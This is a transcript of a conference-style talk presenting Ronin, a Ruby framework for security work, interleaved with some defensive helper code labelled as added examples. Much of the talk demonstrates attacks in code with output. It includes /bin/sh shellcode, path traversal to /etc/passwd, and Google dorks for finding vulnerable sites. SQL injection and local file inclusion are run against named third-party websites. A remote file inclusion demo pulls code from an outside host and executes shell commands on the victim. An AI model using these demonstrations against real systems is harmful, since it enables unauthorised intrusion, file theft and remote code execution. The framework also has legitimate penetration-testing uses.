Ronin: A Platform for Publishing and Mayhem

I'm here to talk about Ronin, a Platform for Publishing and Mayhem. To start off, what exactly is Ronin?

Ruby (not Rails)


        Ruby programming language logo

It's written in Ruby, not Rails.

A Hacking Environment

$ ronin
>> puts "insert hax here"

It's a Hacking Environment built on top of Ruby.

A Platform for Publishing


        Scissor-lift platform

It's also a Platform for Publishing, also built on top of Ruby.

Free


        Empty Box labeled "Free Stuff"

It's free.

Put all of that together...


        Samurai with Bear-Head

You get something like this...

The Hacking Environment

(RUBY << Convenience::Methods) + Database

Convenience Methods

Do more in one-line:

"damn right".md5
# => "b93cb1fa1844e0e594b171fc8c05f807"

Binary data

0x1337.bytes(4)
# => [55, 19, 0, 0]
0x1337.pack(Arch.i686)
# => "7\x13\0\0"

0x1337.pack(Arch.arm_le,2)
# => "7\x13"
"7\x13\0\0".depack(Arch.i686)
# => 4919
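As an added example (not Ronin's own code), here are plain-Ruby stand-ins for the `bytes`, `pack` and `depack` calls above, built on core `Array#pack` / `String#unpack1`; the `ARCHES` table and its symbols are assumptions for this example, and the big-endian entries go beyond what the slide shows.

```ruby
# Added example, not Ronin's code: plain-Ruby stand-ins for the Integer#bytes,
# Integer#pack and String#depack calls shown above, built on core Array#pack
# and String#unpack1. The ARCHES table and the arch symbols are assumptions
# made for this example; big-endian entries go beyond what the page shows.
ARCHES = {
  i686:   { endian: :little, word: 4 },
  x86_64: { endian: :little, word: 8 },
  arm_le: { endian: :little, word: 4 },
  arm_be: { endian: :big,    word: 4 },
  ppc:    { endian: :big,    word: 4 }
}.freeze

# Build the Array#pack / String#unpack directive for a width and byte order.
def pack_directive(endian, width)
  base = { 1 => 'C', 2 => 'S', 4 => 'L', 8 => 'Q' }.fetch(width) { raise ArgumentError, "unsupported width: #{width}" }
  width == 1 ? base : base + (endian == :little ? '<' : '>')
end

# Integer -> array of `width` little-endian bytes: bytes_of(0x1337, 4) => [55, 19, 0, 0]
def bytes_of(value, width)
  Array.new(width) { |i| (value >> (8 * i)) & 0xff }
end

# Integer -> binary string in the architecture's byte order; width defaults to
# the word size, mirroring 0x1337.pack(Arch.i686) => "7\x13\0\0".
def pack_int(value, arch, width = nil)
  spec = ARCHES.fetch(arch)
  width ||= spec[:word]
  [value].pack(pack_directive(spec[:endian], width))
end

# Binary string -> Integer, the inverse of pack_int: depack_int("7\x13\0\0", :i686) => 4919
def depack_int(data, arch)
  spec = ARCHES.fetch(arch)
  data.unpack1(pack_directive(spec[:endian], data.bytesize))
end
```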

Generating Text

Chars.ascii.random_char
# => "\n"
Chars.alpha_numeric.random_chars(5)
# => ["y", "3", "G", "w", "h"]
Chars.hexadecimal.random_string(10..15)
# => "3067BBdFCce"

Hexdumps

File.hexdump 'path/to/data'
hexdump some_data
File.unhexdump('path/to/hexdump.txt')

Base64

payload = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\
\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\
\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\
\x73\x68\x00\x89\xec\x5d\xc3"

payload.base64_encode
# => "6ypeiXYIxkYHAMdGDAAAAAoAuAsAAACJ841OCI1WDM2AuAEAAAC7AAAAAM2A\n6NH///8vYmluL3NoAInsXcM=\n"
"c2VjcmV0\n".base64_decode
# => "secret"

Digests

"leet school".md5
# => "1b11ba66f5e9d40a7eef699cd812e362"
"lol train".sha1
# => "37f05f0cc2914615c580af396df5c66316112f48"
"admin".sha256
# => "8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918"
"this is so contrived".sha512
# => "8520cdc51bf485d17aef7c088bee0ce9e475fa098fb6e1b5df24abaa2ef95c0b3f1dc7d1beb8c5f723db8a18e74ccd24f07ed5fa083bbab4de266dd014a6a8ca"

Paths

Path.up(7)
# => #<Ronin::Path:../../../../../../..>

Path.up(5) / 'etc' / 'passwd'
# => #<Ronin::Path:../../../../../etc/passwd>

IPs

IPAddr.each('10.1.1.1/24') do |ip|
  ...
end
IPAddr.each('10.1.*.1-5') do |ip|
  ...
end
IPAddr.each('::ff::02-0a::c3') do |ip6|
  ...
end
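As an added example (a stand-in written for this page, not Ronin's implementation), a plain-Ruby expander for the address patterns `IPAddr.each` accepts above: CIDR blocks, `*` wildcards and `a-b` octet ranges, IPv4 only. It is useful for checking how large a scope pattern is before matching it against an allowlist or a log.

```ruby
require 'ipaddr'

# Added example, not Ronin's code: a plain-Ruby expander for the address
# patterns IPAddr.each accepts above (CIDR blocks, '*' wildcards and 'a-b'
# octet ranges). Written for this page as a stand-in; IPv4 only.

# Expand one octet pattern: "7" -> [7], "*" -> 0..255, "1-5" -> [1, 2, 3, 4, 5].
def expand_octet(part)
  octets = case part
           when '*'                then (0..255).to_a
           when /\A(\d+)-(\d+)\z/  then (Integer($1)..Integer($2)).to_a
           when /\A\d+\z/          then [Integer(part)]
           else raise ArgumentError, "bad octet pattern: #{part.inspect}"
           end
  unless octets.any? && octets.all? { |o| o.between?(0, 255) }
    raise ArgumentError, "octet out of range: #{part.inspect}"
  end
  octets
end

# Yield every IPv4 address matched by a CIDR block or glob pattern as an IPAddr;
# returns an Enumerator when no block is given.
def each_ip(pattern, &block)
  return enum_for(:each_ip, pattern) unless block

  if pattern.include?('/')
    # IPAddr masks host bits, so 10.1.1.1/24 walks 10.1.1.0 .. 10.1.1.255.
    IPAddr.new(pattern).to_range.each(&block)
  else
    parts = pattern.split('.', -1)
    raise ArgumentError, "expected four octets: #{pattern.inspect}" unless parts.size == 4
    first, *rest = parts.map { |p| expand_octet(p) }
    first.product(*rest).each { |octets| yield IPAddr.new(octets.join('.')) }
  end
end

# Size and bounds of a pattern, so a scope can be sanity-checked before use.
def ip_summary(pattern)
  ips = each_ip(pattern).to_a
  { count: ips.size, first: ips.first.to_s, last: ips.last.to_s }
end
```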

URLs

url = URI('http://example.com/index.php?q=hello&page=Main')
# => #<URI::HTTP:0x7f8be66a21a0 URL:http://example.com/index.php?q=hello&page=Main>

url.query_params
# => {"q"=>"hello", "page"=>"Main"}

url.query_params['q'] = "hello AND 1=0"
# => "hello AND 1=0"

puts url
http://example.com/index.php?q=hello+AND+1%3D0&page=Main
# => nil

... And there's still more

ronin.rubyforge.org/docs/ronin

The Database

DataMapper + sqlite3:

The Database uses DataMapper, a Ruby ORM, and the sqlite3 database by default.

ORM

Object Relational Mapper:

require 'ronin/model'

class Person

  include Ronin::Model

  property :id, Serial
  property :name, String
  property :age, Integer

end

ORM stands for Object Relational Mapper, meaning that we can define our models as Classes, and rows in the database become Objects.

No SQL Needed

Person.create(:name => 'bla', :age => 22)
Person.first(:name => 'bla')
Person.all(:age.in => (18..30))

A major benefit of using an ORM is that there is no SQL needed. Create and query records all from the comfort of Ruby.

The Platform

Manages Overlays and their contents:

  • install
  • update
  • uninstall

The Platform allows for the installation, the updating and removal of Overlays and their contents.

Overlay

A directory (with some structure) that can contain:

  • Extensions (Small pieces of Code)
  • Cacheable Objects (Exploits, Payloads, etc)
  • Static Files (Erb Templates, XML, YAML, etc)
  • Supporting Code

What's an Overlay, you ask? It's simply a directory that may contain extensions, cacheable objects, static files and other supporting code.

Host anywhere

Can be hosted with:

  • SubVersion (SVN)
  • Mercurial (Hg)
  • Git
  • Rsync

Overlays can also be hosted anywhere using SubVersion, Mercurial, Git or even Rsync.

Install an Overlay

$ ronin install git://example.com/repo.git
$ ronin install --svn http://example.com/repo/trunk/

Update them

$ ronin update

Self Publishing

Release what you want, when you want to.

Public/Semi-Public/Private.

Step 1: Generate an Overlay

$ sudo gem install ronin-gen
$ ronin-gen overlay path/to/overlay
  ./lib/
  ./lib/init.rb
  ./objects/
  ./tasks/
  ./Rakefile
  ./ronin.xml
$ cd path/to/overlay
$ ronin-gen extension my_ext
  ./lib/
  ./lib/my_ext.rb
  ./lib/my_ext/
  ./extension.rb
... hack hack hack ...

Generate an Overlay using the ronin-gen command. As you can see, a lib/ directory was created for miscellaneous code, an objects/ directory for the Cacheable Objects and a ronin.xml file that describes the Overlay.

You can also generate extensions with the ronin-gen command.

Step 2: Host it Somewhere

Host it somewhere, perhaps on your own private server; again, Overlays do not have to be public.

Step 3: ????


      Grimace shows up at a Star Wars convention

Question-mark.

Step 4: Profit


      Mini-casino inside of a cubicle

Profit. It's that easy.

Where's the Mayhem?


        Ownage is Imminent

Ronin Dorks

Supports various Google ™ Dorks:

$ sudo gem install ronin-dorks
$ ronin-dorks
>>

The Ronin Dorks library provides support for various Google ™ Dorks. Google Dorking is the act of performing search queries that yield vulnerable web sites or sensitive information. Ronin Dorks uses the GScraper library.

Ronin Dorks Examples

Web::Dorks.inurl('stmt').first_page.urls
Web::Dorks.index_of_cgi_bin.first_page.urls
Web::Dorks.php_my_admin.page(2).urls
Web::Dorks.sharepoint(:inurl => 'edu').first_page.urls

Ronin Exploits

Provides exploitation and payload crafting functionality:

$ sudo gem install ronin-exploits

Ronin Exploits allows exploit developers to write exploits and payloads in Ruby.

Ronin Exploit Example

require 'ronin/exploits'

ronin_tcp_exploit do
  cache do
    self.name = 'trivial example'
    self.version = '0.2'
    self.license = License.cc_by_nc
    self.default_port = 1337
  end

  def build
    @buffer = 'some data'
  end

  def deploy
    tcp_connect_and_send @buffer
  end
end

Using Ronin Exploits it becomes easy to define Exploits in Ruby, without having to write excess code.

Ronin Payload Example

require 'ronin/payloads'

ronin_shellcode do
end

Ronin SQL

Provides support for various SQL related tasks:

$ sudo gem install --no-rdoc ronin-sql
$ ronin-sql
>>

Ronin SQL provides support for various SQL related security tasks. The library currently supports scanning for SQL Injections and crafting custom SQL Injection payloads.

Ronin SQL Examples

url = URI('http://redteatrosalternativos.com/_05enlaces/links/phpHoo3.php?viewCat=1')

url.has_sqli?
# => true

sqli = url.first_sqli
# => #<Ronin::SQL::Injection: ...>

Ronin PHP

Provides support for various PHP security tasks:

$ sudo gem install ronin-php
$ ronin-php
>>

Ronin PHP provides support for various PHP related security tasks. The library currently supports Local File Inclusion (LFI) and Remote File Inclusion (RFI) detection, scanning and exploitation.

Ronin PHP also comes with a custom RFI payload which uses PHP Remote Procedure Call (RPC) to execute arbitrary code or commands through the RFI. This payload also sports a cool Web 2.0 AJAX interface.

Ronin PHP: LFI Example

url = URI('http://www.e-builds.com/?page=Portfolio')

lfi = url.first_lfi
# => #<Ronin::PHP::LFI: ...>

lfi.get('/etc/passwd')
# => "..."

lfi.include('/etc/passwd')
# => #<Ronin::PHP::LFI::File:/etc/passwd>

lfi.include_target('lighttpd.conf')
# => #<Ronin::PHP::LFI::File:/etc/lighttpd/lighttpd.conf>

Ronin PHP: RFI Example

url = URI('http://www.example.com/page.php?layout=default')

rfi = url.first_rfi
# => #<Ronin::PHP::RFI: ...>
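On the defender's side, the same two request patterns the LFI and RFI sections describe (a traversal or absolute path in a parameter, a URL in a parameter) are easy to flag in web server logs. The following is an added example written for this page, not Ronin's code; the log lines are constructed and the addresses come from the RFC 5737 documentation ranges.

```ruby
require 'uri'
# Added example, not Ronin's code: defender-side detection of the request
# patterns the LFI and RFI sections above describe (traversal or absolute
# path in a parameter; a URL in a parameter), run over constructed access-log
# lines. IPs are RFC 5737 documentation addresses; the log is made up.
SAMPLE_LOG = <<~LOG
  192.0.2.10 - - [21/Aug/2008:10:29:38 +0000] "GET /?page=Portfolio HTTP/1.1" 200 5120
  192.0.2.11 - - [21/Aug/2008:10:29:40 +0000] "GET /?page=../../../../etc/passwd HTTP/1.1" 200 1540
  192.0.2.11 - - [21/Aug/2008:10:29:41 +0000] "GET /?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1540
  192.0.2.12 - - [21/Aug/2008:10:29:45 +0000] "GET /page.php?layout=http://203.0.113.5/f.php HTTP/1.1" 200 88
  192.0.2.13 - - [21/Aug/2008:10:29:50 +0000] "GET /page.php?layout=default HTTP/1.1" 200 4096
LOG
# Client IP and request target from a combined-format line.
LINE_RE = /\A(?<ip>\S+) .*?"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+"/

# Decode a query component once (%2F, +) so encoded traversal is not missed;
# a malformed %-escape is kept raw rather than aborting the scan.
def decode_once(str)
  URI.decode_www_form_component(str.to_s)
rescue ArgumentError
  str.to_s
end

# Split a raw query string into decoded [name, value] pairs.
def parse_query(query)
  query.to_s.split('&').map do |pair|
    name, value = pair.split('=', 2)
    [decode_once(name), decode_once(value)]
  end
end

# Classify one parameter value as :rfi, :lfi or nil (nothing suspicious).
def classify_value(value)
  return :rfi if value.match?(%r{\A[a-z][a-z0-9+.-]*://}i)       # remote include URL
  return :lfi if value.include?('../') || value.include?('..\\')  # path traversal
  return :lfi if value.start_with?('/')                           # absolute local path
  nil
end

# Scan log text; returns one finding per suspicious parameter, in log order.
def scan_access_log(log)
  log.each_line.flat_map do |line|
    m = LINE_RE.match(line) or next []
    _path, query = m[:target].split('?', 2)
    parse_query(query).filter_map do |name, value|
      kind = classify_value(value) or next
      { ip: m[:ip], kind: kind, param: name, value: value }
    end
  end
end
```

The third sample line shows why values are decoded before matching: the percent-encoded traversal would slip past a check on the raw query string.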

Ronin PHP: RPC over RFI

client = rfi.rpc

client.include('http://www.sketchy.com/my_functions.php')
# => true

client.fingerprint
# => {...}

client.call('shell.exec','whoami')
# => "www"

Ronin PHP: RPC Console Service

php = client.console
php.phpversion
# => "4.3.10"

php.php_uname('-m')
# => "i686"

Ronin PHP: RPC Shell Service

sh = client.shell
sh.cwd
# => "/var/www/site/\n"

sh.cd '..'
# => ""

sh.exec('date -u')
# => "Thu Aug 21 10:29:38 UTC 2008\n"

sh.system('ps')
   PID TTY          TIME CMD
 27042 pts/8    00:00:00 bash
 27841 pts/8    00:00:00 ps
# => nil

Ronin Scanners

Provides Ruby interfaces to various third-party security scanners:

$ sudo gem install ronin-scanners
$ ronin-scanners
>>

Ronin Scanners provides Ruby interfaces to various third-party security scanners. It currently supports Nmap and all of its command-line options. It also supports Nikto, the HTTP Server scanner.

Ronin Scanners Example

require 'ronin/scanners/nmap'

Scanners::Nmap.scan(
  :targets => 'www.google.com',
  :ports => [80, 21, 25],
  :service_scan => true
)
# => nil
Scanners::Nmap.import_scan(
  :targets => 'www.google.com',
  :ports => [80, 21, 25],
  :service_scan => true
)
# => [...]

Typing Ruby, while you're already in Ruby, is easier than remembering Nmap's command-line options.

Ronin Web

Provides web-scraping and spidering functionality for Ronin:

$ sudo gem install ronin-web
$ ronin-web
>>

Ronin Web Example

page = Web.get('http://reddit.com/')
puts page.search('a.title/@href')
agent = Web::Spider.host('example.com') do |s|
  s.every_url { |url| ... }
  s.every_page { |page| ... }
end
